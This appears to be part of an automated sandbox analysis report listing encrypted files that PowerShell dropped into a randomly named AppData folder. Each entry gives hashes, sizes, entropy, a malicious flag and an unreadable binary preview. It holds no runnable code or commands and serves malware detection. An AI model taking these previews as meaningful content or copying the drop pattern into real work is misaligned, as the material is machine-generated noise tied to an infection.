Encrypted:	true
SSDEEP:	3072:yDLVUFW9x75eXQ6mdkqCOdIkuCASir7TqU5E7TlxHL:MUux75eQk8dCCASe7WUWlxr
MD5:	6E4063E484BFF5F1696CDF10BDC2744E
SHA1:	816DF965F606029C89570CF69F1F01338F0F6A28
SHA-256:	2CCBE69AF425229FFF577A2E19BE4459A5CDBB9A8177ADE18EEA935A6FC28254
SHA-512:	78DECD165F93E1A40CBA758AE44E0A12A9B1A5B20A0E7E137A59F55A41514310C20A6A49F604B41DF47CFF88FEAB2454B9FCCA9D0D516021578E8437B95C994E
Malicious:	true
Reputation:	unknown
Preview:	..../.0.W.}...........R..=....Fp$B\|..T....c.....v.9..o..q.l ....nm..d.D..UF.E......a...{..{!I....'..nA....V...=h.. ..........uU..>.$.4.{..#z@.5...k..Aw......:..I6C2..Nf.w#..p....u...z..R..a..x`6.s...Ys...<,.../.....NW......W.....H...2f[.%..X..yZi...j....(..#..oc.OU..2......$..+].I....2.w..5..~.d.b..8 .+..k.../...%..t...u..>....o.)...1..=M.Xg.g.x.}.0.j.,<...3d....C.&..@8.;.a@...e'.o.....%..p.c\Z.....}.pF.....=o...&...D........u.....S..".UM&...=.....$ .J..!.....Urh..K...iDk...)}.....5.^N...E.>.GUB}....+...\.J&.+<4..=eSM......k.~...vM".....Sc6..........($d...!.o.......iQ.[&.+.......t..Iu..p..&..6...H.@.}.S...P$..\|.!i.).Gm@J.1..p..7.i....Z....Lj7.....e.A....nRh.aS..r ...~..i..#..F.Uh...M&..(.X^...,.Z..[P..@...c!Q.....$..-..'._.........C..O.V.86....%05..-..Y/......[.............a..._@ .O...-.H..i..%.aN..V.4i...."o.aE........'A..t..pS@d.v\|.$..X....(.....4..F..T...,K......GX.<0w.\|GS..T..$.../..,..>,....R../3..MA....<W^c."...5m,m..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\KPxVMuHgwsqlmaQyjLc.DwXVlceiuQEGvn Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	130650
Entropy (8bit):	7.998448415462144
Encrypted:	true
SSDEEP:	3072:+6nCmHexCJZ4dFgnn+yQgUpF4fHNulp+pVqFjyBMze:+6nobFg+yKr4fslAmdC
MD5:	A417F5C54D1CCFC4016317567B999F1A
SHA1:	C7EBCB4CAED2FD8ADF2F4876557970CC29CFE5F3
SHA-256:	AE83B1260A4D0D4D63D772319B3A8A7613372D12AA3EF64A11C030241D8133EC
SHA-512:	B2BC1FD630A92FEBF42BABECE9BCD983A411B78E6ED88476A456C9B09050D59FD3D49A0911C41811C0FBA7A976AD2869603100EEC33193EB1216AB6518A62250
Malicious:	true
Reputation:	unknown
Preview:	..A.a.......^Z.c...W....u\af.z.....}..J.....>.w...Bm0.x..K7Z.&..A.p.'...."..7....Ij!h.E..}.8.......q...u.(u..rM..n.. \.+N@}..Vk.H:.,.....y@...3..b.H...a.E.Z.......yW ..Q....v..q.."Q)].!.@.8_n..>.......h5D...M...:.g^....9~F..{IS.N..+..'t4..t.pp3.......hx..WS...yej...(....E..z..j......&.8..-{......A...iN3...dkzCA.....K.Hw.:....)...!Xs....w@.7.&. .)z..p...NkWOP6..hP....v..gp.J... ..g..7.V .b.@&..hz.P.tg,I....8[..r.......3V.ae0.2..y...pI:zre.\|.....`......O..W.....Fu.m.FB...n..{b......K.R.n.._.de.!.X_.8`.....+h.E.<s...\Xs?.'..R..~..`../...,C/$..'.f......\.............4r.F......J...Y^....E.....83.-..s.P:.0Ygz....b....,..d..f..(...r...$..zs.]n{.;Z...eX..%.".M..R...".Y..@..q$.J.f.o....m.6_q....xH...&.^j.N_.M.....G. .pq...&{......n.....c.A${...01..m!...8..k.`.w...Z.x.......;..b{.....g..f+..#.W.DH.&r..Qa.M*..L..8..u..J......w...Z.;..4..k.q.i.....b....hU..\|L.t....../....2/LC...%..1.>...+k3l\..+c..!.....x.....'..e".B..{.T.f.p.E.......Y7r.....D..v....&

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\KQtxbMyISCZDzwJGrl.qAHRtFrZeJigynfYUa Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	149384
Entropy (8bit):	7.998809821404202
Encrypted:	true
SSDEEP:	3072:2fnTiJkxG5pFGElyo7Mxed963kfpnHVar115gu6Ty8bLroLN:2f2Jkw5So7uen63IpnkrH+DTALN
MD5:	B88AA4C8474228DA7850A64DA1FB4D40
SHA1:	AE43ECE7997EF388E683BABC0CCCC72B8DB2ACE8
SHA-256:	613F0DE18999F4A26B1711EB464B0EF715CBC3915FD5C6C29DC955F77804FB51
SHA-512:	81C2CFE898553031B38BBB6616E4246BE3328BB8BF57ECD6A135D11D548FBA8F0DD7CD3D90BE1907A885AFB264BC7075140AA5697FB721626E4B86059E995683
Malicious:	true
Reputation:	unknown
Preview:	....v.lu...J.u......X.2.-3f.J..s.x.U.@X......O..n.W.g..qH\...V.....1.wb}c.......PM.....&.k.R.$....E..\|...Y......._...@.Ms...?......8..2&[.o#"..d;..7?1...z.....`.....m.J,.Y..+...a.Q.u...A..J@[J.....H.\....4DNeZ;..Q.y.O+..U.......a.........<... ..}G....(S.^r.8n...?.......'l.Q@r....h.$B.w.%U..1...%.w.Bs.F5......q....T.e....&....8.%~..Tu4.u...;.....\v^....t..Z.....L......S...n......t.R.'d.i2.Jl.05Q\|...GH..m...z.L....F.A\|..:..P.....<8.+.......K..q6.w.]...k(.t..^...P...k..\|><m.{....v.?w!:...!.....2K\..m.0bG.x..y.KB../.\..Y...7.'..s0.^..j..0I..bg.x.{.nY.....k...-.H...~..,..Q$....b.A]....+.x..T...$.8.\.I.+g\<k.......W...kJ.K.....2.(.........F...._..4.u.j....iV.9..C?6......\|....5...'.. .p...7I.....).i......G...h.;.(9...v..p.3.s.f.t_6cI.k3.m.@.M.D..wm.v...z...JLJW...`...ff#..$.l.<..Cn.L.x...e..v..0....L.aW.....].. .i..4rf."r.,7w.<F.&... ......Vu....t.I.).`+.S....UY.....n..{..............X.......X....JvE.?.t...].E.\|...<UCm..v\...3.."._f. ..U

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\LRdKFotHgYCGbDOxhpB.mLYxMsEBPbGcaHqO Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	125892
Entropy (8bit):	7.998641695595895
Encrypted:	true
SSDEEP:	3072:IZhd9jijbk+Kz+o8fpcXPoBeXMn3QcV4Xsm9KrpdK29e0:YjjAwKo8XgIAR8IKl
MD5:	306D5D5F1F8A7D4F91333AE436D7DD36
SHA1:	3FF9AF39A02604C03AB89419443B5BC13ECD0268
SHA-256:	F4EB8F15C5F48C35541F1825E6523B902BD414DF3EEFF5CDAEEACB9B2035F974
SHA-512:	B7D8BE77E6958B0CF3B320D73E05B8728C124AFE1D7951725A5507A5061006FA0C40F2C3FD0475D760B4C2E1FF2500910CAC776BE323BA77B07D0D6F173412BF
Malicious:	true
Reputation:	unknown
Preview:	Qp.s..:.}.O..;q.....(2..2...l<..o..\|.....W.E..z.b..^H.~..K.......b..u..s.f....JB..M....M.[....R.x\|X}...=....[B}.9.F...H....y.J.ts.....&iOl...>B.~......j/..7...b.O..L'I.sABR..q...h..+...q`.z.0}..2t`)+...Q.....]..$.y.....m!_....9....ikl.(......../..w.^.........T.l~Y.!.Z}...M...#.X{..J.Jtz..J.?~..Kk!....F..cq..P2.."......2&.@......s.........&....s.\..0Y...^..!..z.P..{c.@....4.=\|.ZQ.Q.,..L....5`Zi.T9..K.E1...K....~`6.:b...8.....'.a..a....!,B.....2.....I...R.Q...8G...a.u^...4.46..x.....f...r\|...&G......x./......r.{.6.OhUN...&........ji....'U.U.\r2W..>.......wt.Kt@...e.1.-...A.)...i.=%.....f.T..`.x!.b.y.x...T.i..S..PQ.I..`.$z._......J ...6.......{..T.C....2's.....f...8....AV..5....o..E....+........l...i.x?.0.}...g.......ld..q<@.....".3Ox.{.[).q.9..,.k...?..b...Rg.us...gVBg..7WYd.gzx...a.z.&n.#.=..q...5....vT...Wp).N...!..A.#DI.fl...Bf#..o&.....c....!.......0!..w...e..f.$.\..\|......M.....8...=.-........:.....*.!uJJk...s(...w.F.l..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\LVIoySHhNPxpaBbADmu.ylCYVRrQFLOpPmfxb Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	168679
Entropy (8bit):	7.999075392184261
Encrypted:	true
SSDEEP:	3072:pEnQtXy7ZcXqfCOXsDesXchOGBm86Oto2tT7Y1smW4vPnj53Tmrka4zf6Au:oQtXGK6fCHDevTBm86G3TSsl4vvj53Ng
MD5:	02CFA81A1BE731DDE11FBCF1079574F8
SHA1:	0289415F172DE74A5B83718E83D28B3D9FC2DECC
SHA-256:	C3EE5C667FFE901C5AB8FF7C94DD91393AE5FBE6C161A2E6E671B689BC30F694
SHA-512:	352B6D2E0EE6E2AF0BCC34EA825ADFBEA3CAB8631A60DC8BCDD0136D492143C93966FDDFC2DCF6BE684B5AFCA8A8B4DEA7A896E3CF1DAB258F458C4581AADA5B
Malicious:	true
Reputation:	unknown
Preview:	.........5..@....x....W....5b.3yc.?..6a...@...+..x..Z...sC..R.<..T..nb#....A.A...._......!>.[yK4w..fe.GsUB.T!.`1$.WqtR.k5..M#.s..i.)-........R..s.!..%..1c..O....7.k,T...Zk.o....\|..4..A6....(/....]..8f.N..\m8..k........9...2;........q=.5._.2d...t.z.."q..Mp@..+.i.Y....J#.E....u..a}.....#...63W.:w......>..h..x..1 .?..y..0.Y.>Kf.t/...F.4.V\:]sr.6..{F......z.{,k1.S]._..!n...zW.a....[94Z7......A...5.p%d...Q.5. ...8.(.'.c..;..{.....!...z..Ir[....>...#.".#.K......B..@h.$A....E.<..-jsy..+g...O.v#.]Ce....\|.,.]..v.&.v....%.1H.0.D.O...+k...iD:.!vJo......P).[.A.K&....v...(.....J....q.:...>.N......S.....3A....c...Cs.b.av.7.=.....sho..>.W..H.].7-itD..........G...)h.....VZ.yl.s.rOI.....I.OCS.m..4P...O%.q#.s".C..."A....R....:..."...~.!tj....J..KP9!.W...7...~.!c...~t. \|-..].q..j.\.H5...<.CRI...Y....r.}...).....j...\bQ.).r.u.......m}v.k..Io5.&}....h R.....6....no..W.8H....._.. E..=.e...k.4.[Y......vV...%..>...C1y.._.....@a..`.}U......n.^...)t..h..x..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\MqRsjEJozmAZf.IRskXTAQodWCNEwzmG Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	147471
Entropy (8bit):	7.998855206017281
Encrypted:	true
SSDEEP:	3072:je/ctvEnfVI728BygzSUcCYQBJ5bV3uAqaxVwqoyJom7moiP91OJFjLyXAUC41O:+IcnfC7zBDzfcCXxkeV9rJoYcPP8Fneo
MD5:	34CC2F8CC76A43C2977E3ACEBBA4AA2B
SHA1:	81AD76F8AC29781FC653C0CA8B4CED7CCCAA70AB
SHA-256:	E7B552EE5981CE67A501E13D40DFD6FE899581084CC4570C76A6B3BA5DAC04DE
SHA-512:	4E810316F7D76BA482E2EEAB9DA1CEB1B934760F19F8C610CA4734A18FC4F3B23FBDD37BB6C1985304FD89563AB4375FEA6F12E77F6A67C149E0E8E38D411092
Malicious:	true
Reputation:	unknown
Preview:	....v.>H...E.z.zl..eD`:......K.F......'n............y..`.'..[....{.t..r......F...e>.i.qO.....V.....t?p._.....j....A.}9.@..IJ..4;=y....1.&.P...2....7..(.3W................&.i50...)Q z......C..`A.x.gJ.E0..s.3...z..!..X.I...._g..{... <..4..2..{..DW.i....>.y.."...!...-X.$.C..."e....[8.k7E...rj..N!.)..1......P.....`:G..!..={.#.^O.^;Ir..^.Me..!>R..])..@h..p....2.>J.E...5[z...).U.5;...W.=..Vs.......8'.....X.8v..{,...~B..v.....WO.......M....v.g.$..Af97..........q......1.y..$.mTB3F.%.c~.\|.7..G.C.m..?.....$...V.N..L.\|.$..........?..g.>...Zv..._?.w........Y.........{..>.F...?.....}qSB.!..........R......)_(.0B.S....Y.i....c.....-...>.^.}..R...B.r.j^..%.s.(.8...YR.......s.T.#...{.k.MC.........u...w.~...G.^l._....]7"..8..Hq..%.p...j..{..=.f.......@..L.......'BNcrTh.S.>..#Y\|....I....\|..9..?..@.,..;.F.....0....T>k?L.=.l...^cI.R.Q.\).?....0....N.Dr.m@....IU..be{T.Bi..T...Y.&....W.2.M.9..;]Y'5I.l..e..C0....E+...2j.$.~....#.2....

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\NBFnbsgCel.IoifTQsUFvjc Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	66860
Entropy (8bit):	7.997545408059135
Encrypted:	true
SSDEEP:	1536:AyB0JC8+owVf2QGccQtGQdTwg45xU2Nn+:98+oAOQGCt/dk75bn+
MD5:	B32CA8459F326C1D1FC5ECCF53968D43
SHA1:	6165FA423639681D4B42D119548BA10773A49DF2
SHA-256:	ABB18F6131DE795FC0E368AA4A814E1A7876FBADFE2846F4DF62452A3E29C8B5
SHA-512:	DBDAABCDE7EDD4F55809A963FCC930A9BD84D0FC665179E7FA42C1EA903AD3FCF8969EB7B0A363063589F2E5C75A2E728926661604536D0205BCD879C8096ADB
Malicious:	true
Reputation:	unknown
Preview:	......VL\r.=e..g?.F5'....R.......,....&.$.S.^.=...A[m.t....}E.k..9^...h .....Np.Z$..5."`..\|..v....."..;.\.?.W...g..d.<.....#......8...j...$f.S..D.^..\lN/.@\|..c....._....v!..B.7/...+.^O..[)k..2...=B..;d0,;M...M(o...g.....]l..m.......2.~.. ..!.)..w[......_....`El. '5.h..?.n[n[\|...r.4.rh..P.....z..P..te..5=..$..j.H.^.II......eq+..e..S6=.e,..1.1...\|..#@.F.#:.../..`.(...).......G.?.....%...y.,..b.]{..A!}..t..`.;.j....y7.3.o.+.....y...m..6.....f6._z.C..B...^.2H......[ ^..\|SO...$..5..?>.t...e.j...i.Z...$.]Y...p#......W^........%.X!.y...y.d"..B..6$.D.....2..t..tf...9..^w.G..0..1V.QEE\|.....zk.Y..zA.~Qp...gb..'=Cv*#!....%.....5.....ot_...4..<(a..u..0.J.....y..L...q...'.8n#.z..H......^..0.......s....m'.<Y...F.?......b.i...w[.L.Km....h.C..n.w].Jt..9..Pt`.!..``.m.....R#.p].f.k.,.XoW.......r%...... ......y...`83....W;...y..Z....@.@...A.5.>4...mV,...%.ez.9F..Pe[...^.MsY%..rD,.r.0......La...\<.....i.q..g..6{....\|..!....^.a.jwJ`...x.2.....s&

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\NPMZYxQktFyAIq.JwAQPBruaiH Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	94250
Entropy (8bit):	7.998528791669274
Encrypted:	true
SSDEEP:	1536:71pKcN7DyRShd6rtUYyztJkxAowpZsu0H9s3LJAWJltYAy3uSX7cHRrftWvzyQ:NN7DyRQdwrgJwwpZYS39tBy3PrcxzC
MD5:	5C7F26CB87EA0D9935BF68C3A075B672
SHA1:	1F1E378607FB93D7334839BAB429E0A69E41B740
SHA-256:	C0A8349158BB5AFA9D0FC8D9975BC93FBA13E76734DED83818623BEB2E350F1A
SHA-512:	E9A04EC506D52B535F9D7AEBBC24DA0A83195C3EE93BBED881546EEDD4BEBF021DCE531BEBEAB2FDCF7657E4B601D0C3D5BCF44B09C9234A02380AC2E92C1816
Malicious:	false
Reputation:	unknown
Preview:	M.;..W).k!..+.d.hp..!.....W..%.w.R.SQ..+#.#e....`..0.LEQ,.>..\.F.a..3..Z.^..$...Sl..N\..0'...+.....4.O....y..+...0R.X......3...`._..."`..K.....~.@.q.[g.f.........e..d;.K.Y.(.$aM.k.L..F6...,7w..LS....3 ..C..h.1....w.:.}M.T.R...`".p.8.f0...B'n..6.2..Bd.t.nI.5.sF...T.G.w.......`...=...Ro.......QE..,.....m..a..7.......t.3...;...~.(.\..:w}`.K....S.....k.Q.N..1.f........$.UfH\.A.u......../...=...+f.DV....H.C...oLU..E...\..GP{..a1GY........BD-.../ .c..S.e......".(..\|...Z..Ju..p...`Cf...(..I"....Nl.d...vd....r>\...{.* ..OQ..^...&"M.h..K.Q....W...!Mg.$K=.7.....@.P.Ug.0..?..../y.GcU..j...coK.........>6.K.n...P....R.Iz...d.l........-Y....:b...Im.K.,..6#i........2....6..MtG.KD.#F.e=.U.....XA.B......Q..6z..k.R.{s..d8..+..t...g...W..}.Q)..3.z.o....\R.P^.e.f.n9.s^.>...A:....CF...=wU.lF`;s$...m...Ft...[n".........0.....o.w...<....d..x.6.c.....<7(-T..VV...\|.........`&~5B.jyq.Vg.....m.0...U"....p.\|.-A....d9.%.l{u8..u..9..lB...$A\|.KY........o.SU...;.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\OHoTbIcglqPxpC.rfqYsVXiPyw Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	179803
Entropy (8bit):	7.999026883449452
Encrypted:	true
SSDEEP:	3072:PRJYX57k5gOpxBvqEoQUnnhQJtyUdM+gNnuk92vJ0e/AH4P+CAgvIN/qCT:ZJgqgH9QqWJgUdMDNukUJZBGl2Aqq
MD5:	652E265F62E10F4315BD832585CBBA74
SHA1:	8501FDDFC431B013EF8E0AB7D5BF35056ED7BD38
SHA-256:	8A8AA051A6A7CD94975E27A39EFBB02350A68423F11EF060C63413FDE13D619E
SHA-512:	4CACB15228F9CFBBC3424BA790E2AC465066458A3EAB4D532842FC020E5472E98F56182901BFDC24C9C27BF3890872662ED9217C2C494D17D6C99C679BC6C341
Malicious:	false
Reputation:	unknown
Preview:	.H!N....65.bKc1...:..."..5...P.KARl.p.H....^....}.....p5.O.{..>.........#...xE.'....m.m.:.....' ..........`...T....BX.M...h:.^.ce.=...}.m.=.t.46..wx..../..y&..,0.#..O......:.[4......}(e..`.G.._CIs....if.~....E".. E..@.....H.b....tD.........$..>.l.0O..d;m...'.....~...C....7h..#.S..$:/...Z.....v. .<.....-..`..H.......,.4HH....c.....g9......S.;.(.vl....d...J..O.j-].'..XBH..X:"M.8.2.._....g.r...^..N...g'"J..O.'...#7F.R....y.C...n:.".1....4..@.....B.7.Y.L.Q...UT....l..<.2..[4V4].,..K.!~.a.c@;.T[...,.nXU;']rQ....s(G.h7..sr.~Z.,..LbO0P.Lr.....D^..].`...>..../0.Q.MM\"j..W........x..;.1.!..k..os.yV....' .\k.[.:.bt....j...)/y.C..>P..f..4....}.j0..pjg.K7.....(....w...\!....o4.H..JR.c./......'.....I....#\|.+E...K........7.....\|.7.MLK.._.i`{....P..._.R?..6..Y...A.:W...".\...>.....L..M+.@..w....J......{.k.%l..F....-.........ue\.6..N.~(...IG8.0.......!.^......O.u@hDA.'.L.M. ..D.M@.U.Z& *...B..v..q`.....r..=JL..[.0....!.%.Kl.....ox(.<?8.u..R

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\OMHbkiQdpqxWels.BgtLihDjzGvMc Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	126261
Entropy (8bit):	7.998496999907017
Encrypted:	true
SSDEEP:	3072:MU//7JK0yudUIOgY6UZ+JJoW4qtCV/nyZz9NvSlAS87Be:MidfZnU4qqtdZpNvSl+7w
MD5:	2C797F42C40B0C8910D3E61EE529E69D
SHA1:	CB6638BE357F93F638D97685C863049CA68F165C
SHA-256:	D89C67AF44086678ABD8C528EFE88E51DB26EFDC01ECC4D4445A5CFD06E1ACDC
SHA-512:	695291D62603F47EC6780634CE91178FB188B6AB45CB1C49BF230395BD363878E984704FCE936282CE8D3356FF3A963627BDDBA858F8D52BAAB5B89BB49E02D3
Malicious:	false
Reputation:	unknown
Preview:	F.. z(..!u.W..;.kMwXR....6."..G3F.....[..q.A.O.Z..@..mL...Ci........&..mo...a..#.q..BD...i...D..p..\|./t.M......]F..'T.;^.....5....j...A.....B.k.Xh.[IUA@1...s.iw.).Q.B.Cn..Qs... u.AMdb.)byE.E.Gs.....%[...%.Q..R>.5....Q.T.)....T.X..6..u:.(....=.S.d.T].i.7P...Y].m.O.:.@.....6.4..b;5Z\|?...j$)..=@.`..q..$o..IZz\|.o.9.(...p.a..e&...=Z..I.....r^....S..Xo.\|........="..W.....G.V....!._....7.....U...!...b...U..Q...^^.k.X8..._t...n.p...t]@.A.K.0....._...z..........j.."..b...O..a.C.1.Y..o.5.O.....a4..v.1..........M3.`..-.VwPT}..\|sfT:.k....B.).Q..R.....QI.......xa.R.~..Z..[...%.e+....[.....A).A'...1pu....R...R..<....&.}..P..k..f..%n..$.....6.>.^..B.B....FC...T...tF$.m\|8.pV.../~...(.......a.0...)..h0.c.C..z......Cd..4.A...g?t.azD..n....v.W.1.R.U.L.1q.&........(.7..V..B..#g.........e.G..7LrlA.....a.....9.0.....<.5...P.ygT.Ck.^#h..Vg.$..D...>.r...$I.Bl.D..~....7n;..-U.$.9.M.f.....?QM"x.%.^....6 d...s5Ga.}.g.G.)..y...q.&...8.F..r.......3w{......L....... .an..!

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\OjxTYdNhPtzpSgH.OXBIvVzLfZlNCurHkGM Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	70141
Entropy (8bit):	7.997125005472372
Encrypted:	true
SSDEEP:	1536:skmpZV0drFrdSVvtMbFaTwfUWGoDNIMTgkeOlq/iu5krcq5+Tizz1:skq0dJrdKtfTa0keOlk9O+Wn1
MD5:	747EB950B8782931CBC5F79775E9EB6F
SHA1:	7AA23B827FFCF8FAAEBDDAADA4CFF0F2E7631C2C
SHA-256:	AD375633695F29F14404ED2EE183EFD58881203702EED5656FE0017F583B0B00
SHA-512:	297451EE9864DB08687CAB41C78730EB130A9E72AAC3C859DDFA3194D88E54D64A91AD92A36C3C6220DA7E5ED8CF296FAB91A1BAB79882463227795A7769DB6D
Malicious:	true
Reputation:	unknown
Preview:	...m..#.v@^......./.2d...n...I.:..z..w..h..3H..G....~.G......v... !J..yT....N....F..2..d%.>..r(g.GFA...mJ....t)...z.D..../1.q;..j~.:.M2N.o.=C.VV..;Z..".;.,.......P...9y,../.g0..{.....[A..!..%r.Z....{...Lmm3...)#...0.U....bUI.`...]...3...%..O.oV..i.L..'...#%...P..S..._s.........'....2%.m.......l.).Q..."M.In.).(.........i.6...J ...8....N+$'......u.h _....FN..#..RRz..&.r...[....3.I1.v=....j...3_1\..O....D.}g..XNo]..<H.BFr15..(%RT$n.X:%...s\|.c.@...U......S[..UBpH...."..D.`.j.}..4Sn.5.~x...f..:l.#W.s.3^...G@t.f....r..jOhk.l..B...Y....;.Yt.1mC."...f.....F...-L.B.\|..a...z..(.I. &$..@.s.Y..[G.u+.~YJ...$M.r~.....&.=.;..h..'^M..e7..zmW..>..;..k:\|..0CA7<....6..@...-..@^.~.....#..[..4...>.i...f.YM=...<.f.{....#?._....S..{C.6.ZJ..i..P./Hr..m..bd....D.T...../.!.c.G.....p.0.'is....SK....g;.b.X.;..k..9.qI.j.\.g8]..O.r,..s......`o%...[...Q2......?...#.;...2BLH\|rt.d{S.h9.........-.8.Y0..~.hT.r.^w.-.C]..W...T\c..:}.3].$X..y...J.!9.M..@8.....zW.#...g..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\OqBvtgbiJSTedRr.vZxnLdetugmqlyhY Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	146942
Entropy (8bit):	7.99870386359248
Encrypted:	true
SSDEEP:	3072:R3KaS2yvjU3EWRJvm7txMjoQoX48qqQPXD93UNrjLcE/v0f4r:Ral2ybW7u7txMjJr/XDFiLcEn0f8
MD5:	FF1695DCEEFBCA98B55F78E45D65E172
SHA1:	7DAD0B7CAC1329113EAA0B942290736276612239
SHA-256:	7D2EBF9155857140278AE42BE2563337F3988E717C02553FDCDD553E44466BAF
SHA-512:	E9C02CA1D66660EB5C88A1EE12909BC18977423F593AF873477715F02ADBF7D67CEB3AE17CBCC6E53D88D63C94E34732778B5AD66D7E70919BE3C28EBF217CF3
Malicious:	false
Reputation:	unknown
Preview:	.E..............:....#&[%]..!....;...<......5#.......fm..Q.'....!.d..e..y5%...DO.l..0..79....^U}...n......7.....G.%.....r...b...?z...Z..Cwc3.+...9`.......T.._...ngf.T..2....)`..L.p..T..=.Ui......i.....=&.2...>.M......GD.w.}i.A.1.5........q..yVW.....W..7OG..QY.P.............\|'..J.;...&....w.....pM.(...a...h.pb.....~.,4$........^.;eW6;U81S.m.X....Ea5..h.Q...{f........E..0....6...w).X...M0..E...4...V..E.7.H.P..8./..z.&.]I.".......9o.:aO....^.L...{.....".L.5!.......+.[.L.X8.Z.!..<v`>2yvfi-.....`0....&4#..1......WMV.\".h.....F..:..P.=tN.5i(.....I....`.v.....&.a..j...n.).....H..%W..A.Z]....Z...w.......$\}6/...(......80........\|,.QU.a8-w....m+#O....,.p.p.fa.3[.m^.D.kC`..,xWs.....<....;....be.....\|j.$....d.(.)....^.c9/.....?........X.5?_.B.]....{B:..#...$5..#A.k..iy..[...lM....}...k.....1.~..(..>J..\|..yb...`...Xu.._..PC..I.z.>.}..dl..Gx..b.>b.2.Kd>..<[T.yI1..z.k}...\>9.U{.D.9T.8...Y...-.F.A.2...?..%..3.m).............:.M:.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\OuydComPSsJI.VQUxYTScfjGAeOHMnz Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	58986
Entropy (8bit):	7.997351429970604
Encrypted:	true
SSDEEP:	1536:bOXk1T0QfbDSkTalDoR1WUuiabu22K5lj7vmeO06TTvhBd0j:uETxfPSkTWMfumXK5ljqvxTri
MD5:	2FE70D3D7405B63C589D0BE583F58ABA
SHA1:	C600A08EF02CCB85642F3D4B50B633A9D5449EAF
SHA-256:	829B9EE56FE9F793D9AC0974BDB42297E2EFE0BFD0D39223729B5E387C41A1F5
SHA-512:	91CC2E812E97063BD14C9B91C02BF879A04A844D382978CE8D4496A7ABEEFD99E224A3A241E74B9F1A1DF7B430A858B0FD0316B137AA8058A037C792E39E1729
Malicious:	true
Reputation:	unknown
Preview:	.J\|)[..`_3......U......-@....!.1W...... .(#...G..V...H..R.v.....,.~W....Rj.d..uC..i.\|S.J...D...Q.t.C.o...Y.^.3a8../.h/,.<4F..}..X\|.29e.W.#]i..R.CZ...G...(.5..-s....... .\|.li.SwRmH.\|5.+c<]"8H/...m.v....>.4i..._..+.^...<.e...L.lg2d...i......}@?.o......N.y..}HV.W.}^........B.%.....d.t.-x....x...&U.{.......(..T9.}lC..v.1H...@l.E....O.\.o..l..%.A\c...J..5.T.W....L4{.8<..5,..6..D+..W.!HK..Dj.j.....$$'....l...+n.+./Sc.i].D74..........q\.F.(>x.7.].Q../Vz..7.n/.$.+.{.......4..x..2.r5.@..Q.%..qk... ..D..4~.E?.+:B<.J......o...V.q8..uP.Y...X~D...!x.I.....7}..E]..Jj...#.c*M..=~.G..j.z=N.fz.o\......[&.v.T%.g...R.B,.,H.......X.i...l.#..(9...)Z.....Ld,}...c......I.]\|..C.U/.a...4ffhl..`.[V...U.QeH..F,...W9.}8.=..m.Mm......-.4P./. t.9YnYq&T."..h../......h....=....._4...B...xh..M .68(..J...!.....J@..$.Rw...h)..W...K.c<@g._.....7..xlS.....6..j..F...xOl.\|..)<?...I.....CS.Z.......A8.7+J...7......gMV...p.u...."sm.j....c....y.v{Q.._.yb...V&.>{w[....I{.x.(

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\PIEKOXUhAYBg.qDBzpfyHPbGNvkR Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	84044
Entropy (8bit):	7.997861799672926
Encrypted:	true
SSDEEP:	1536:XfPRnop1RKVTJSQC7aKchhzNi4J7TBNugpKMeyOK5Rtpcqc/x6M45e:XXRnoUlPC7aKcbzlKoKiJcJ6bo
MD5:	3601E43718B6C49C4D7D4C49D50FABDD
SHA1:	40F134DE0A327C3F078E1C0D17BA50AC53E299D4
SHA-256:	1C2E13DCDCFE9775F30B98D03BE624A666444774FB9465BEAFDF549520342998
SHA-512:	19AB532A8FF006564E4BD1CF37988F6D9FCDC79FFA2A8F39DF21D1065CBE0058A9F6A1861E1C6F821D290EF12685A2719374B35A250C6980538293CCAFE6E8B6
Malicious:	true
Reputation:	unknown
